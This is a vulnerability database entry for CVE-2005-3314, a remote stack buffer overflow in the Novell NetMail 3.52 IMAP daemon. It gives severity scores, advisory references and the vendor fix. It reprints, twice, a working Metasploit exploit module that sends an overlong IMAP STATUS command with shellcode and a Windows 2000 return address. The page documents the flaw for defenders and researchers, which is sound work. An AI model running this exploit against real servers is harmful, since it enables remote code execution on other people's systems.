CVE-2005-3314
CVSS 7.5
Published: 2005-11-18 17:03:00
Last modified: 2011-08-01 00:00:00

[Original] Stack-based buffer overflow in the IMAP daemon in Novell Netmail 3.5.2 allows remote attackers to execute arbitrary code via "long verb arguments."


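[CNNVD] Novell NetMail IMAPD buffer overflow vulnerability (CNNVD-200511-260)

        Novell NetMail is a mail and calendar system based on Internet-standard messaging and security protocols.
        Because user input is not properly filtered, the IMAPD in Novell NetMail contains a buffer overflow vulnerability that may allow an attacker to execute arbitrary code remotely.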

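- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]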

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3314
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3314
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-260
(official data source) CNNVD

- Other links and resources

http://www.zerodayinitiative.com/advisories/ZDI-05-003.html
(VENDOR_ADVISORY)  MISC  http://www.zerodayinitiative.com/advisories/ZDI-05-003.html
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972673.htm
(PATCH)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972673.htm
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972672.htm
(PATCH)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972672.htm
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972665.htm
(PATCH)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972665.htm
http://xforce.iss.net/xforce/xfdb/23114
(UNKNOWN)  XF  netmail-imap-multiple-bo(23114)
http://www.vupen.com/english/advisories/2005/2494
(VENDOR_ADVISORY)  VUPEN  ADV-2005-2494
http://www.securityfocus.com/bid/15491
(UNKNOWN)  BID  15491
http://www.osvdb.org/20956
(UNKNOWN)  OSVDB  20956
http://securitytracker.com/id?1015240
(UNKNOWN)  SECTRACK  1015240
http://secunia.com/advisories/17641
(VENDOR_ADVISORY)  SECUNIA  17641

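- Vulnerability information

Novell NetMail IMAPD buffer overflow vulnerability
High risk  Buffer overflow
2005-11-18 00:00:00 2006-06-12 00:00:00
Remote
        Novell NetMail is a mail and calendar system based on Internet-standard messaging and security protocols.
        Because user input is not properly filtered, the IMAPD in Novell NetMail contains a buffer overflow vulnerability that may allow an attacker to execute arbitrary code remotely.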

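- Advisories and patches

        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: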
        http://support.novell.com/security-alerts

- Vulnerability information (16483)

Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow (EDBID:16483)
windows remote
2010-05-09 Verified
0 metasploit
##
# $Id: novell_netmail_status.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS
				verb. By sending an overly long string, an attacker can overwrite the
				buffer and control program execution.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-3314' ],
					[ 'OSVDB', '20956' ],
					[ 'BID', '15491' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP0-SP4 English',   { 'Ret' => 0x75022ac4 }],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Nov 18 2005'))

	end

	def exploit
		sploit =  "a002 STATUS " + rand_text_english(1602) + payload.encoded
		sploit << "\xeb\x06" + rand_text_english(2) + [target.ret].pack('V')
		sploit <<  [0xe8, -485].pack('CV') + rand_text_english(150) + " inbox"

		info = connect_login

		if (info == true)
			print_status("Trying target #{target.name}...")
			sock.put(sploit + "\r\n")
		else
			print_status("Not falling through with exploit")
		end

		handler
		disconnect
	end
end
		

- Vulnerability information (F83168)

Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow (PacketStormID:F83168)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,imap
CVE-2005-3314

This Metasploit module exploits a stack overflow in Novell's Netmail 3.52 IMAP STATUS verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Novell's Netmail 3.52 IMAP STATUS
				verb. By sending an overly long string, an attacker can overwrite the 
				buffer and control program execution. 
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-3314' ],
					[ 'OSVDB', '20956' ],
					[ 'BID', '15491' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Windows 2000 SP0-SP4 English',   { 'Ret' => 0x75022ac4 }], 
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Nov 18 2005'))

	end
	
	def exploit
		sploit =  "a002 STATUS " + rand_text_english(1602) + payload.encoded  
		sploit << "\xeb\x06" + rand_text_english(2) + [target.ret].pack('V')  
		sploit <<  [0xe8, -485].pack('CV') + rand_text_english(150) + " inbox" 

		info = connect_login 
		
		if (info == true)
			print_status("Trying target #{target.name}...")
			sock.put(sploit + "\r\n")
		else
			print_status("Not falling through with exploit")	
		end
		
		handler
		disconnect
	end
end
    

- Vulnerability information (F41706)

Zero Day Initiative Advisory 05-03 (PacketStormID:F41706)
2005-11-20 00:00:00
Tipping Point,Sebastian Apelt  zerodayinitiative.com
advisory,remote,overflow,arbitrary
CVE-2005-3314

ZDI-05-003: Novell Netmail IMAPD suffers from buffer overflows. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Netmail. Authentication is required to exploit this vulnerability. Affected Products: Novell Netmail 3.5.2.

    

- Vulnerability information

20956
Novell NetMail IMAP Service Verb Argument Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Private, Exploit Commercial

- Vulnerability description

A remote overflow exists in Novell NetMail. The IMAP service fails to perform proper bounds checking resulting in a stack-based buffer overflow. With a specially crafted request containing an overly long verb argument, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-11-18 2005-10-24
2005-11-17 Unknown

- Solution

Upgrade to version 3.52e or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

Novell NetMail IMAP Unspecified Buffer Overflow Vulnerability
Boundary Condition Error 15491
Yes No
2005-11-18 12:00:00 2008-02-01 05:38:00
Discovered by Sebastian Apelt.

- Affected software versions

Novell NetMail 3.52 D

- Vulnerability discussion

Novell NetMail is prone to a buffer-overflow vulnerability in an unspecified IMAP command. Successful exploits may result in a denial of service or arbitrary code execution.

NetMail 3.52D is affected, but earlier versions may also be vulnerable.

Details regarding the precise nature of this vulnerability are not currently available. We will update this BID as more information emerges.

- Exploit

The following exploit code is available as a module for the Metasploit Framework:

- Solution

Novell has released fixes to address this issue.


Novell NetMail 3.52 D

- Related references

 

 
